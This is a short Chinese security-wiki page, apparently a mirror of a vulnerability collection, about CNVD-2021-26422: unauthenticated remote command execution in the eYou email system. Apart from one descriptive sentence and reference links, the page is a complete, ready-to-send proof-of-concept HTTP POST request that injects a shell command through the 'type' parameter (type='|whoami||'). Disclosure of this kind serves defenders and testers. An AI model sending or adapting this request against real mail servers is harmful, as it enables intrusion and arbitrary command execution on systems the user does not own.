menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right 亿邮邮件系统远程命令执行漏洞 (CNVD-2021-26422).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    亿邮邮件系统远程命令执行漏洞 (CNVD-2021-26422).md
    1010 B / 2021-05-21 09:14:38
        # 亿邮邮件系统远程命令执行漏洞 (CNVD-2021-26422)
    
    亿邮电子邮件系统存在远程命令执行漏洞,未经身份验证的攻击者发送恶意请求到该系统可导致远程命令执行。
    
    情报可以见:https://forum.ywhack.com/viewthread.php?tid=115418
    
    PoC:
    
    
    ```
    POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
    Host: ip
    Connection: close
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 16
    
    type='|whoami||'
    ```
    
    ref:
    
    * https://mp.weixin.qq.com/s/KDlSyDn7DWwnnFeDednk8g
    * https://www.cnvd.org.cn/flaw/show/CNVD-2021-26422
    
    
    links
    file_download